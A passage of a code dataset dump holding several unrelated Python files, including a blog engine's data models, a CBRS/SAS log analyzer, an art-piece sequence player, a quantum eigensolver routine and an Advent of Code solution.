@property\r\n  def summary_hash(self):\r\n    val = (self.title, self.summary, self.tags, self.published)\r\n    return hashlib.sha1(str(val)).hexdigest()\r\n  \r\n  @property\r\n  def tags_hash(self):\r\n    \"\"\" Hash of tags only, used by TagCloudContentGenerator\r\n    @author Tom Allen \"\"\"\r\n    val = (self.tags)\r\n    return hashlib.sha1(str(val)).hexdigest()\r\n\r\n  def publish(self):\r\n    regenerate = False\r\n    if not self.path:\r\n      num = 0\r\n      content = None\r\n      while not content:\r\n        \"\"\" Tries to find a unique URL for this post, and adds the content\r\n        to the datastore when it finds one. \"\"\"\r\n        path = utils.format_post_path(self, num)\r\n        content = static.add(path, '', config.html_mime_type)\r\n        num += 1\r\n      self.path = path\r\n      self.put()\r\n      # Force regenerate on new publish. 
Also helps with generation of\r\n      # chronologically previous and next page.\r\n      regenerate = True\r\n\r\n    # Create BlogDate and TagCounter objects given the data for this post.\r\n    BlogDate.create_for_post(self)\r\n    TagCounter.create_for_post(self)\r\n\r\n    \"\"\" For every type of generated content (indexes, tags, etc) dependent\r\n    upon this particular post:\r\n    i) Fetch the current list of resources and etag from the current\r\n    ContentGenerator\r\n    ii) Fetch the stored list of resources and etag from self.deps\r\n    iii) If the etag has changed, we need to regenerate all resources - so we\r\n    set to_regenerate to the union of the old and new resources.\r\n    iv) If the etag has not changed, we only need to regenerate added or\r\n    removed resources - so we set to_regenerate to the symmetric difference of\r\n    the old and new resources.\r\n    v) For each resource that needs regenerating, we call generate_resource().\r\n    vi) Finally, we update the BlogPost's list of deps with the new set of\r\n    resources and etag.\r\n    \r\n    Later edit: The only change here is that we check if the ContentGenerator\r\n    permits deferred execution. If it doesn't, we execute generate_resource\r\n    as normal, but if it does, we call deferred.defer for each changed\r\n    dependency.\r\n    \r\n    (Some of this sequence is now encapsulated in other functions, but it's\r\n    doing roughly the same thing still.)\r\n    \"\"\"\r\n    for generator_class, deps in self.get_deps(regenerate=regenerate):\r\n      for dep in deps:\r\n        if generator_class.can_defer:\r\n          deferred.defer(generator_class.generate_resource, None, dep)\r\n        else:\r\n          generator_class.generate_resource(self, dep)\r\n    self.put()\r\n\r\n  def remove(self):\r\n    if not self.is_saved():\r\n      return\r\n    # It is important that the get_deps() return the post dependency\r\n    # before the list dependencies as the BlogPost entity gets deleted\r\n    # while calling PostContentGenerator.\r\n    for generator_class, deps in self.get_deps(regenerate=True):\r\n      for dep in deps:\r\n        if generator_class.can_defer:\r\n          deferred.defer(generator_class.generate_resource, None, dep)\r\n        else:\r\n          if generator_class.name() == 'PostContentGenerator':\r\n            generator_class.generate_resource(self, dep, action='delete')\r\n            self.delete()\r\n          else:\r\n            generator_class.generate_resource(self, dep)\r\n\r\n  def get_deps(self, regenerate=False):\r\n    if not self.deps:\r\n      self.deps = {}\r\n    for generator_class in generators.generator_list:\r\n      new_deps = set(generator_class.get_resource_list(self))\r\n      new_etag = generator_class.get_etag(self)\r\n      old_deps, old_etag = self.deps.get(generator_class.name(), (set(), None))\r\n      if new_etag != old_etag or regenerate:\r\n        # If the etag has changed, regenerate everything\r\n        to_regenerate = new_deps | old_deps\r\n      else:\r\n        # Otherwise just regenerate the changes\r\n        to_regenerate = new_deps ^ old_deps\r\n      self.deps[generator_class.name()] = (new_deps, new_etag)\r\n      yield generator_class, to_regenerate\r\n\r\nclass Page(db.Model):\r\n  # The URL path to the page.\r\n  path = db.StringProperty(required=True)\r\n  title = db.TextProperty(required=True)\r\n  template = db.StringProperty(required=True)\r\n  body = db.TextProperty(required=True)\r\n  created = db.DateTimeProperty(required=True, auto_now_add=True)\r\n  updated = db.DateTimeProperty()\r\n\r\n  @property\r\n  def rendered(self):\r\n    # Returns the rendered body.\r\n    return markup.render_body(self)\r\n\r\n  @property\r\n  def hash(self):\r\n    val = (self.path, self.body, self.updated)\r\n    return 
hashlib.sha1(str(val)).hexdigest()\r\n\r\n def publish(self):\r\n self._key_name = self.path\r\n self.put()\r\n generators.PageContentGenerator.generate_resource(self, self.path);\r\n\r\n def remove(self):\r\n if not self.is_saved(): \r\n return\r\n self.delete()\r\n generators.PageContentGenerator.generate_resource(self, self.path, action='delete')\r\n\r\nclass VersionInfo(db.Model):\r\n bloggart_major = db.IntegerProperty(required=True)\r\n bloggart_minor = db.IntegerProperty(required=True)\r\n bloggart_rev = db.IntegerProperty(required=True)\r\n\r\n @property\r\n def bloggart_version(self):\r\n return (self.bloggart_major, self.bloggart_minor, self.bloggart_rev)\r\n\r\nclass TagCounter(db.Model):\r\n tagname = db.StringProperty(required=True)\r\n tagcount = db.IntegerProperty(required=True, default=0)\r\n\r\n @property\r\n def tag_and_count(self):\r\n return (utils.slugify(self.tagname.lower()), self.tagcount)\r\n \r\n @classmethod\r\n def create_for_post(cls, post):\r\n import logging\r\n for tag in post.normalized_tags:\r\n logging.debug('TagCounter.create_for_post in models.py, tag = ' + tag)\r\n inst = TagCounter.get_by_key_name(key_names=str(tag))\r\n if not inst:\r\n inst = TagCounter(key_name=str(tag), tagname=str(tag), tagcount=0)\r\n inst.tagcount += 1\r\n inst.put()\r\n \r\nclass UserPrefs(db.Model):\r\n user = db.UserProperty()\r\n name = db.StringProperty()\r\n postscount = db.IntegerProperty(required=True, default=0)\r\n namepath = db.StringProperty() # Unique URL path made from name + a number if necessary.\r\n\r\n @property\r\n def name_and_count(self):\r\n return (namepath, self.postscount)\r\n\r\n def publish(self):\r\n if not self.namepath:\r\n num = 0\r\n content = None\r\n while not content:\r\n \"\"\" Tries to find a unique URL for this user, and adds the content\r\n to the datastore when it finds one. 
\"\"\"\r\n path = utils.format_user_path(self, num)\r\n content = static.add(path, '', config.html_mime_type)\r\n num += 1\r\n self.namepath = path\r\n self.put()\r\n","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":10268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"372936757","text":"from graph import Graph\nfrom AntColony import AntColony\n\ncolony_size = 25\niters_num = 10\n\ng = Graph(\"graph18_1.txt\")\ncolony = AntColony(colony_size, g, g.destination)\nresult = colony.find_best_path(iters_num)\nwith open(\"output.txt\", 'w') as f:\n f.write(\"Min path length: \" + str(result[0]) + \"\\n\")\n f.write(\"Possible paths (node - (weight) - node: \\n\")\n for path in result[1]:\n for i in range(len(path)-1):\n f.write(str(path[i]) + \" - (\" + str(g.get_weight(path[i], path[i+1])) +\n \") - \")\n f.write(str(path[-1]) + \"\\n\")\n\n f.write(\"All graph (node-from, node-to: weight): \\n\")\n n = g.get_node_list()\n for i in n:\n for j in n:\n w = g.get_weight(i, j)\n if w is not None:\n f.write(str(i) + ', ' + str(j) + ': ' + str(w) + '\\n')\n\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"497605181","text":"\n'''\n\nSAS Log Analyzer\n\n'''\n\n\nimport re\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n\nhbt_req = \"{\\\"heartbeatRequest\\\":[\"\nhbt_res = \"responseEntity=<200,{\\\"heartbeatResponse\\\":[\"\ngrnt_req = \"{\\\"grantRequest\\\":[{\"\n#grnt_resp = \"{\\\"grantResponse\\\":[{\"\ngrnt_resp = \"responseBody={\\\"grantResponse\\\":\"\n\nprint(\"Working... please wait\")\n\nfh_req = open('dp.cbrs_2019_03_05.log')\nfh_res = open('dp.cbrs_2019_03_05.log')\nfh_grnt = open('dp.cbrs_2019_03_05.log')\nfh_grnt_res = open('dp.cbrs_2019_03_05.log')\n\n\n##fh_req = open('dp.cbrs_2019_01_18_from_ravi.log')\n##fh_res = open('dp.cbrs_2019_01_18_from_ravi.log')\n##fh_grnt = open('dp.cbrs_2019_01_18_from_ravi.log')\n##fh_grnt_res = open('dp.cbrs_2019_01_18_from_ravi.log')\n\n##fh_req = open('dp.cbrs_2019_01_24.log')\n##fh_res = open('dp.cbrs_2019_01_24.log')\n##fh_grnt = open('dp.cbrs_2019_01_24.log')\n##fh_grnt_res = open('dp.cbrs_2019_01_24.log')\n\n\n#fh_req = open('dp.cbrs_2019_01_18_Grant_failed_CBSD cannot be granted for the given frequency range.log')\n#fh_res = open('dp.cbrs_2019_01_18_Grant_failed_CBSD cannot be granted for the given frequency range.log')\n#fh_grnt = open('dp.cbrs_2019_01_18_Grant_failed_CBSD cannot be granted for the given frequency range.log')\n#fh_grnt_res = open('dp.cbrs_2019_01_18_Grant_failed_CBSD cannot be granted for the given frequency range.log')\n\n \ncbsd_Id = []\ngrant_Id = []\nop_state = []\ngrnt_renew = []\ntime_stamp = []\nsas_id = []\n\n\ncbsd_Id_hb_res = []\ngrant_Id_hb_res = []\ntime_stamp_hb_res = []\nsas_id_hb_res = []\ntransmitExpireTime= []\ngrantExpireTime = []\nheartbeatInterval = []\nresponseCode = []\nresp_data = []\ncbsd_test = []\n\ncbsd_id_grnt_req = []\nmeas_report_grnt_req = []\ntime_stamp_grnt_req = []\nsas_id_grnt_req = []\n\ncbsd_id_grnt_res = []\ngrant_id_res = []\ntime_stamp_grnt_res = []\nsas_id_grnt_res = []\n\n\n\n\ndef hbt_request():\n for ln in fh_req:\n if hbt_req in ln:\n for cbsdId in re.finditer('cbsdId', ln):\n cbsdId = cbsdId.end()\n\n fccid = ln[cbsdId + 3 : cbsdId + 29]\n cbsd_Id.append(fccid)\n\n grantId = ln[cbsdId + 40: cbsdId + 53]\n grant_Id.append(grantId)\n\n opstate = 
ln[cbsdId + 73: cbsdId + 83]\n op_state.append(opstate)\n\n grntrenew = ln[cbsdId + 98 :cbsdId + 102]\n grnt_renew.append(grntrenew)\n\n timestamp = ln[0:21]\n time_stamp.append(timestamp)\n\n sasId = ln[23:40]\n sas_id.append(sasId)\n\n #break\n \n\nhbt_request() \ndf_hb_req = pd.DataFrame({'time_stamp_req':time_stamp, 'sas_id_req':sas_id, 'cbsdId_req':cbsd_Id, 'grantId_req':grant_Id, \n 'operational_state':op_state, 'grant_renew':grnt_renew })\n\ndf_hb_req.to_csv('hbt_req_test.csv') \ndf_hb_req.head()\n\n\ndef hbt_response():\n for ln in fh_res:\n if hbt_res in ln:\n for cbsdId in re.finditer('cbsdId', ln):\n cbsdId = cbsdId.end()\n \n fccid = ln[cbsdId + 3 : cbsdId + 29]\n cbsd_Id_hb_res.append(fccid)\n \n grantId = ln[cbsdId + 40: cbsdId + 53]\n grant_Id_hb_res.append(grantId)\n \n tras_exp = ln[cbsdId + 75: cbsdId + 98]\n transmitExpireTime.append(tras_exp)\n \n grnt_exp = ln[cbsdId + 115: cbsdId + 140]\n grantExpireTime.append(grnt_exp)\n \n \n response_msg = ln[cbsdId + 140: cbsdId + 260]\n resp_data.append(response_msg)\n \n \n time_stamp = ln[0:23]\n time_stamp_hb_res.append(time_stamp)\n \n sas_id = ln[23:40]\n sas_id_hb_res.append(sas_id)\n \n #break\n \n \n \n \nhbt_response()\n\ndf_hb_res = pd.DataFrame({'time_stamp_res':time_stamp_hb_res, 'sas_id_res':sas_id_hb_res, 'cbsdId_res':cbsd_Id_hb_res, 'grantId_res':grant_Id_hb_res, \n 'transmit_exp':transmitExpireTime,'grant_exp':grantExpireTime, 'resp_data':resp_data})\n\ndf_hb_res.to_csv('hbt_response_test.csv')\ndf_hb_res.head()\n\n\ndef grant_req():\n for ln in fh_grnt:\n if grnt_req in ln:\n for cbsdId in re.finditer('cbsdId', ln):\n cbsdId = cbsdId.end()\n \n fccid = ln[cbsdId + 3 : cbsdId + 29]\n cbsd_id_grnt_req.append(fccid)\n \n time_stamp = ln[0:23]\n time_stamp_grnt_req.append(time_stamp)\n\n sas_id = ln[23:40]\n sas_id_grnt_req.append(sas_id)\n\n measReport = ln[cbsdId + 29 : ]\n meas_report_grnt_req.append(measReport)\n \n \ngrant_req()\ndf_grnt_req = pd.DataFrame({'time_stamp_grnt_req':time_stamp_grnt_req, 'sas_id_grnt_req':sas_id_grnt_req, 'cbsd_id_grnt_req':cbsd_id_grnt_req, 'measReport':meas_report_grnt_req})\ndf_grnt_req.to_csv('grnt_req.csv')\n\ndef grant_res():\n for ln in fh_grnt_res:\n if grnt_resp in ln:\n for cbsdId in re.finditer('cbsdId', ln):\n cbsdId = cbsdId.end()\n\n fccid = ln[cbsdId + 3 : cbsdId + 29]\n cbsd_id_grnt_res.append(fccid)\n\n time_stamp = ln[0:23]\n time_stamp_grnt_res.append(time_stamp)\n \n sas_id = ln[23:40]\n sas_id_grnt_res.append(sas_id)\n \n grnt_id_res = ln[cbsdId: ]\n grant_id_res.append(grnt_id_res)\n \n \n\ngrant_res()\ndf_grnt_res = pd.DataFrame({'time_stamp_grnt_res':time_stamp_grnt_res, 'sas_id_grnt_res':sas_id_grnt_res, \n 'cbsdId_res':cbsd_id_grnt_res, 'grant_id_res':grant_id_res})\ndf_grnt_res.to_csv('grnt_res.csv')\nprint(df_grnt_res['grant_id_res'])\n\n#print(cbsd_id_grnt_res)\n#print(grant_id_res)\n#print(sas_id_grnt_res)\n\n\n\n\n\n#clean-up\n\ndf_hb_req['sas_id_req'] = df_hb_req['sas_id_req'].map(lambda x: x.rstrip('} b'))\ndf_hb_req['cbsdId_req'] = df_hb_req['cbsdId_req'].map(lambda x: x.rstrip('\",'))\ndf_hb_req['operational_state'] = df_hb_req['operational_state'].map(lambda x: x.rstrip('\",\"'))\ndf_hb_req['grant_renew'] = df_hb_req['grant_renew'].replace(to_replace=\"e}]}\", value = \"TRUE\")\ndf_hb_req['grant_renew'] = df_hb_req['grant_renew'].replace(to_replace=\"e},{\", value = \"TRUE\")\n\ndf_hb_res['time_stamp_res'] = df_hb_res['time_stamp_res'].map(lambda x: x.rstrip(' {'))\ndf_hb_res['sas_id_res'] = df_hb_res['sas_id_res'].map(lambda x: x.rstrip('} 
S'))\ndf_hb_res['cbsdId_res'] = df_hb_res['cbsdId_res'].map(lambda x: x.rstrip('\",'))\ndf_hb_res['transmit_exp'] = df_hb_res['transmit_exp'].map(lambda x: x.lstrip(':\"').rstrip('\"'))\ndf_hb_res['grant_exp'] = df_hb_res['grant_exp'].map(lambda x: x.lstrip('\":\"').rstrip('\",'))\n\ndf_grnt_req['time_stamp_grnt_req'] = df_grnt_req['time_stamp_grnt_req'].map(lambda x: x.rstrip(' {'))\ndf_grnt_req['sas_id_grnt_req'] = df_grnt_req['sas_id_grnt_req'].map(lambda x: x.rstrip('}'))\ndf_grnt_req['sas_id_grnt_req'] = df_grnt_req['sas_id_grnt_req'].map(lambda x: x.rstrip('} b'))\ndf_grnt_req['cbsd_id_grnt_req'] = df_grnt_req['cbsd_id_grnt_req'].map(lambda x: x.rstrip('\",'))\n\ndf_grnt_res['time_stamp_grnt_res'] = df_grnt_res['time_stamp_grnt_res'].map(lambda x: x.rstrip(' {'))\ndf_grnt_res['sas_id_grnt_res'] = df_grnt_res['sas_id_grnt_res'].map(lambda x: x.rstrip('}'))\ndf_grnt_res['cbsdId_res'] = df_grnt_res['cbsdId_res'].map(lambda x: x.rstrip('\",'))\n\n\n\n#combine hb_req_res\n\nhb_req_res = pd.concat([df_hb_req, df_hb_res], join='outer', sort=False, axis=1)\nhb_req_res.to_csv('hb_req_res.csv')\n\n# combine grnt_req_res\ngrnt_req_res = pd.concat([df_grnt_req, df_grnt_res], join= 'outer', sort=False, axis=1)\ngrnt_req_res.to_csv('grnt_req_res.csv')\n\n\nprint(\"DONE\")\n\n\n\nimport matplotlib\nimport matplotlib.pyplot as plt\n\n\ndef grant_res():\n for ln in fh_grnt_res:\n if grnt_resp in ln:\n for cbsdId in re.finditer('cbsdId', ln):\n cbsdId = cbsdId.end()\n\n fccid = ln[cbsdId + 3 : cbsdId + 29]\n cbsd_id_grnt_res.append(fccid)\n\n time_stamp = ln[0:23]\n time_stamp_grnt_res.append(time_stamp)\n \n sas_id = ln[23:40]\n sas_id_grnt_res.append(sas_id)\n \n grnt_id_res = ln[cbsdId: ]\n grant_id_res.append(grnt_id_res)\n \n \n\ngrant_res()\ndf_grnt_res_test = pd.DataFrame({'time_stamp_grnt_res':time_stamp_grnt_res, 'sas_id_grnt_res':sas_id_grnt_res, \n 'cbsdId_res':cbsd_id_grnt_res, 'grant_id_res':grant_id_res})\n\ndf_grnt_fail = df_grnt_res_test[df_grnt_res_test['grant_id_res'].str.contains('grant failed')]\ndf_grnt_fail.tail()\ndf_grnt_fail.to_csv('grnt_failures.csv')\n\n#df_grnt_fail = df_grnt_res_test[df_grnt_res_test['grant_id_res'].str.contains('400')]\n#df_grnt_fail.tail()\n#df_grnt_fail.to_csv('grnt_400.csv')\n\n\n#df_grnt_fail = df_grnt_res_test[df_grnt_res_test['grant_id_res'].str.contains('103')]\n#df_grnt_fail.tail()\n#df_grnt_fail.to_csv('grnt_103.csv')\n\ndf_grnt_success = df_grnt_res_test[df_grnt_res_test['grant_id_res'].str.contains('GAA')]\ndf_grnt_success.tail()\ndf_grnt_success.to_csv('grnt_sucess.csv')\n\ngrnt_fail_count = len(df_grnt_fail)\nprint(\"Failed Grants\", grnt_fail_count)\n\ngrnt_success_count = len(df_grnt_success)\nprint(\"Sucessful Grants\", grnt_success_count)\n\ntotal = grnt_fail_count + grnt_success_count\nprint(\"Total\",total)\n\ndf_grnt_analysis = pd.DataFrame({'total':[total], 'grnt_success_count':[grnt_success_count], 'grnt_fail_count':[grnt_fail_count]})\n\n\n\nplt.plot(df_grnt_analysis)\nplt.ylabel('Count')\nplt.title('Grant Summary')\n\nplt.show()\n\n\n\n\n","sub_path":"sas_log_analyzer_v10_clean_up_response_data.py","file_name":"sas_log_analyzer_v10_clean_up_response_data.py","file_ext":"py","file_size_in_byte":9960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"227165445","text":"#!/usr/bin/python\n\nimport argparse\nimport configparser\nimport getopt\nimport os\nimport sys\nimport time\nimport math\nimport random\n\nimport noise\n\nfrom PIL import 
(\n\tImage,\n\tImageChops,\n\tImageDraw,\n\tImageEnhance,\n\tImageFilter,\n\tImageFont,\n\tImageOps,\n)\n\nfrom modules import configuration, player\nfrom modules.rendering import appWindow\nfrom modules.configuration import bcolors\n\n\n\n\ndef timeChecker(sequenceConfig, config) :\n\tsequenceConfig.currentTime = time.time()\n\n\tif sequenceConfig.currentTime - sequenceConfig.startTime > sequenceConfig.currentPieceDuration :\n\t\tsequenceConfig.startTime = time.time()\n\n\t\tif sequenceConfig.playInOrder == True :\n\t\t\tsequenceConfig.playOrder += 1\n\t\t\tif sequenceConfig.playOrder >= len(sequenceConfig.workList) :\n\t\t\t\tsequenceConfig.playOrder = 0\n\t\t\tpieceToPlay = sequenceConfig.playOrder\n\t\telse :\n\t\t\tpieceToPlay = round(random.uniform(0, len(sequenceConfig.workList)-1))\n\n\t\tprint(\"Piece Playing is: \" + str(pieceToPlay))\n\n\t\tsequenceConfig.currentPieceDuration = random.uniform(sequenceConfig.workList[pieceToPlay][1], sequenceConfig.workList[pieceToPlay][2])\n\t\tloadWorkConfig(sequenceConfig.workList[pieceToPlay], sequenceConfig)\n\n\ndef loadWorkConfig(work, sequenceConfig):\n\n\tworkconfig = configparser.ConfigParser()\n\tconfig = configuration.Config()\n\tconfig.startTime = time.time()\n\tconfig.currentTime = time.time()\n\tconfig.reloadConfig = False\n\tconfig.doingReload = False\n\tconfig.checkForConfigChanges = False\n\tconfig.brightnessOverride = work[3]\n\n\tconfig.renderImageFull = sequenceConfig.renderImageFull\n\tconfig.isRunning = True\n\t# This is so the Player does not create a window\n\tconfig.standAlone = False\n\tconfig.callBack = lambda : timeChecker(sequenceConfig, config)\n\n\tconfig.MID = \"\"\n\tconfig.path = sequenceConfig.path\n\n\targument = config.path + \"/configs/\" + sequenceConfig.workListDirectory + work[0]\n\n\tprint(bcolors.WARNING + \"** \")\n\tprint(\"Sequencer: \" + work[0] + \":\" + argument)\n\tprint(bcolors.ENDC)\n\tworkconfig.read(argument)\n\tconfig.fileName = argument\n\tsequenceConfig.playCount=sequenceConfig.playCount+1\n\tprint(\"==========> count play : \" + str(sequenceConfig.playCount))\n\n\tif (sequenceConfig.playCount > sequenceConfig.repeatCountTrigger) :\n\t\t# Clean threads!\n\t\tos.system( config.path + sequenceConfig.restartScript)\n\n\n\t# ****************************************** #\n\t# Sets off the piece based on loading the initiail configs #\n\t# ****************************************** #\n\tplayer.configure(config, workconfig)\n\tconfig.cnvs = sequenceConfig.cnvs\n\tsequenceConfig.mainAppWindow.startWork(config.workRefForSequencer)\n\n\n\ndef loadConfigFile():\n\tparser = argparse.ArgumentParser(description=\"Process\")\n\tparser.add_argument(\"-mname\", type=str, default=\"local\", help=\"machine name (optional)\")\n\tparser.add_argument(\"-path\", type=str, default=\"./\", help=\"directory (optional)\")\n\tparser.add_argument(\n\t\t\"-cfg\",\n\t\ttype=str,\n\t\trequired=False,\n\t\thelp=\"Config File - just need sub-folder and name - e.g. 
p4-6x5/repeater.cfg\",\n\t)\n\tparser.add_argument(\n\t\t\"-brightnessOverride\",\n\t\ttype=int,\n\t\thelp=\"brightness param to override the config value (optional)\",\n\t)\n\targs = parser.parse_args()\n\treturn args\n\n\"\"\"\"\"\" \"\"\"\"\"\" \"\"\"\"\"\" \"\"\"\"\"\" \"\"\"\"\"\" \"\"\"\"\"\" \"\"\"\"\"\" \"\"\"\"\"\" \"\"\"\"\"\" \"\"\"\"\"\" \"\"\ndef loadSequenceFile():\n\n\targs = loadConfigFile()\n\n\tif args.cfg != None:\n\n\t\tworkconfig = configparser.ConfigParser()\n\n\t\tprint(bcolors.OKBLUE + \"** \" + str(args) + \"\" + bcolors.ENDC)\n\t\tsequenceConfig = configuration.Config()\n\t\tsequenceConfig.startTime = time.time()\n\t\tsequenceConfig.currentTime = time.time()\n\t\tsequenceConfig.MID = args.mname\n\t\tsequenceConfig.path = args.path\n\n\t\targument = sequenceConfig.path + \"/configs/\" + args.cfg # + \".cfg\"\n\t\tworkconfig.read(argument)\n\n\t\tsequenceConfig.fileName = argument\n\t\tsequenceConfig.fileNameRaw = args.cfg\n\n\t\tsequenceConfig.imageXOffset = int(workconfig.get(\"displayconfig\", \"imageXOffset\"))\n\t\tsequenceConfig.imageYOffset = int(workconfig.get(\"displayconfig\", \"imageYOffset\"))\n\n\t\tsequenceConfig.canvasOffsetX = int(workconfig.get(\"displayconfig\", \"canvasOffsetX\"))\n\t\tsequenceConfig.canvasOffsetY = int(workconfig.get(\"displayconfig\", \"canvasOffsetY\"))\n\n\t\tsequenceConfig.screenHeight = int(workconfig.get(\"displayconfig\", \"screenHeight\"))\n\t\tsequenceConfig.screenWidth = int(workconfig.get(\"displayconfig\", \"screenWidth\"))\n\n\t\tsequenceConfig.windowXOffset = int(workconfig.get(\"displayconfig\", \"windowXOffset\"))\n\t\tsequenceConfig.windowYOffset = int(workconfig.get(\"displayconfig\", \"windowYOffset\"))\n\n\n\t\tsequenceConfig.playInOrder = (workconfig.getboolean(\"displayconfig\", \"playInOrder\"))\n\t\tsequenceConfig.playOrder = 0 \n\n\t\ttry:\n\t\t\tsequenceConfig.forceBGSwap = (workconfig.getboolean(\"displayconfig\", \"forceBGSwap\"))\n\t\texcept Exception as e:\n\t\t\tprint(str(e))\n\t\t\tsequenceConfig.forceBGSwap = False\n\n\t\tsequenceConfig.workListDirectory = workconfig.get(\"displayconfig\", \"workListDirectory\")\n\t\tsequenceConfig.workListManifest = list(workconfig.get(\"displayconfig\",\"workList\").split(','))\n\t\tsequenceConfig.currentPieceDuration = 1\n\t\tsequenceConfig.playCount = 0\n\n\t\ttry:\n\t\t\tsequenceConfig.restartScript = workconfig.get(\"displayconfig\", \"restartScript\")\n\t\t\tsequenceConfig.repeatCountTrigger = int(workconfig.get(\"displayconfig\", \"repeatCountTrigger\"))\n\t\texcept Exception as e:\n\t\t\tprint(str(e))\n\t\t\tsequenceConfig.restartScript = '/cntrlscripts/restart_full_sequencer.sh'\n\t\t\tsequenceConfig.repeatCountTrigger = 100\n\n\n\t\tsequenceConfig.workList = []\n\n\t\tfor w in sequenceConfig.workListManifest :\n\t\t\twork = workconfig.get(w, \"work\")\n\t\t\tminDuration = int(workconfig.get(w, \"minDuration\"))\n\t\t\tmaxDuration = int(workconfig.get(w, \"maxDuration\"))\n\t\t\ttry:\n\t\t\t\tbrightnessOverride = float(workconfig.get(w,\"brightnessOverride\"))\n\t\t\texcept Exception as e:\n\t\t\t\tprint(str(e))\n\t\t\t\tbrightnessOverride = None\n\n\n\t\t\tsequenceConfig.workList.append([work,minDuration,maxDuration,brightnessOverride])\n\n\n\t\tprint(sequenceConfig.workList)\n\n\n\t\tsequenceConfig.mainAppWindow = appWindow.AppWindow(sequenceConfig)\n\t\tsequenceConfig.mainAppWindow.setUp()\n\t\tsequenceConfig.mainAppWindow.createMainCanvas()\n\n\t\tpieceToPlay = round(random.uniform(0, len(sequenceConfig.workList)-1))\n\t\tpieceToPlay = 
0\n\t\tloadWorkConfig(sequenceConfig.workList[pieceToPlay], sequenceConfig)\n\n\t\t#sequenceConfig.mainAppWindow.run()\n\n\n\n\ndef main():\n\tglobal config, threads\n\n\tloadSequenceFile()\n\t\n\t\"\"\"\n\t# Threading now handled by renderer - e.g. see modules/rendertohub.py\n\tthrd = threading.Thread(target=configure)\n\tthreads.append(thrd)\n\tthrd.start()\n\t\"\"\"\n\n\n# Kick off .......\nif __name__ == \"__main__\":\n\tmain()\n","sub_path":"sequence-player.py","file_name":"sequence-player.py","file_ext":"py","file_size_in_byte":6504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"90842719","text":"# -*- coding: utf-8 -*-\n\n\"\"\" Variational Quantum Eigensolver. \"\"\"\n\nimport logging\n\nfrom qutip.qip.circuit import QubitCircuit\n\n\nlogger = logging.getLogger(__name__)\n\n\ndef _estimate_outcome_probabilities(qc, initial_state, shots):\n \"\"\" Run a circuit a number of times and estimate the probabilities of\n each outcome.\n\n :param QubitCircuit qc:\n The circuit to run. The circuit should contain a single\n measurement and store its result in `.cbits[0]`.\n :param Qobj initial_state:\n The initial state to run the circuit on.\n :param int shots:\n The number of runs to perform.\n\n :return list:\n A list containing the fraction of runs that returned measurements\n 0 and 1.\n \"\"\"\n outcome_counts = [0, 0]\n for _ in range(shots):\n qc.run(state=initial_state)\n result = qc.cbits[0]\n outcome_counts[result] += 1\n return [outcome_counts[0] / shots, outcome_counts[1] / shots]\n\n\ndef _analytic_outcome_probabilities(qc, initial_state):\n \"\"\" Calculate the probabilities of each outcome analytically.\n\n :param QubitCircuit qc:\n The circuit to run. The circuit should contain a single\n measurement and store its result in `.cbits[0]`.\n :param Qobj initial_state:\n The initial state to run the circuit on.\n\n :return list:\n A list containing the probabilities of measurement outcomes 0 and 1.\n \"\"\"\n states, state_probs = qc.run_statistics(initial_state)\n return state_probs\n\n\ndef estimate_energy(\n h_coeffs,\n h_measurement_circuits,\n initial_state,\n ansatz_circuit,\n shots=100,\n analytical=False,\n):\n \"\"\" Estimate the energy of a given state for a specified Hamiltonian.\n\n :param dict h_coeffs:\n The Pauli decomposition of the Hamiltonian. This specifies the\n Hamiltonian. If you have an operator `H` then\n `vqefs.pauli.decompse(H)` will return the required dictionary of\n coefficients.\n :param dict h_measurement_circuits:\n The dictionary of measurement operators for each of the Pauli\n coefficients in `h_coeffs`. If you have a dictionary of coefficients,\n the measurement circuits may be constructed using::\n\n h_measurement_circuits = {\n indices: vqefs.pauli.measurement_circuit(indices)\n for indices in h2d_coeffs\n }\n :param Qobj initial_state:\n The initial state to pass to the completed circuit when it is run.\n :param QubitCircuit ansatz_circuit:\n The circuit used to evolve the initial_state into the prepared state\n which will be measured.\n :param int shots:\n How many times to run and measure each circuit. Default: 100.\n :param bool analytical:\n If True, calculate the probabilities analytically using\n `QubitCircuit.run_statistics(...)`. 
If False, run the\n circuit multiple times with `QubitCircuit.run(...)`.\n Default: False.\n\n :return float:\n The estimated energy of the prepared state.\n \"\"\"\n energy = 0\n N = len(initial_state.dims[0]) # number of qubits\n sign = (N == 1) and 1 or -1\n for indices, coeff in h_coeffs.items():\n if indices == \"I\" * N:\n energy_term = 1\n logger.info(\n \"%s: coeff: %g, energy: %g\", indices, coeff, energy_term,\n )\n else:\n qc = QubitCircuit(N=N, num_cbits=1)\n qc.add_circuit(ansatz_circuit)\n qc.add_circuit(h_measurement_circuits[indices])\n qc.add_measurement(\"M\", targets=[0], classical_store=0)\n if analytical:\n p0, p1 = _analytic_outcome_probabilities(qc, initial_state)\n else:\n p0, p1 = _estimate_outcome_probabilities(qc, initial_state, shots=shots)\n energy_term = sign * ((-1 * p0) + (+1 * p1))\n logger.info(\n \"%s: coeff: %g, energy: %g, probabilities: (%g, %g)\",\n indices,\n coeff,\n energy_term,\n p0,\n p1,\n )\n energy += coeff * energy_term\n return energy\n","sub_path":"vqefs/vqe.py","file_name":"vqe.py","file_ext":"py","file_size_in_byte":4314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"559366620","text":"# --- Day 6: Custom Customs ---\n\ndef answers(person):\n return set(answer for answer in person)\n\n\ndef anyone_yes(group):\n s = set()\n for person in group:\n s.update(answers(person))\n return len(s)\n\n\ndef everyone_yes(group):\n s = set(answers(group[0]))\n for person in group[1:]:\n s = s.intersection(answers(person))\n return len(s)\n\n\ndef read_groups():\n groups = []\n with open('../res/day06.txt') as file:\n lines = file.read().splitlines()\n lines.append('') # add last empty line\n group = []\n for line in lines:\n if line:\n group.append(line)\n else:\n groups.append(group)\n group = []\n return groups\n\n\nif __name__ == '__main__':\n print('Day 6: Custom Customs')\n print('---------------------')\n\n count_a = 0\n count_b = 0\n\n for group in read_groups():\n count_a += 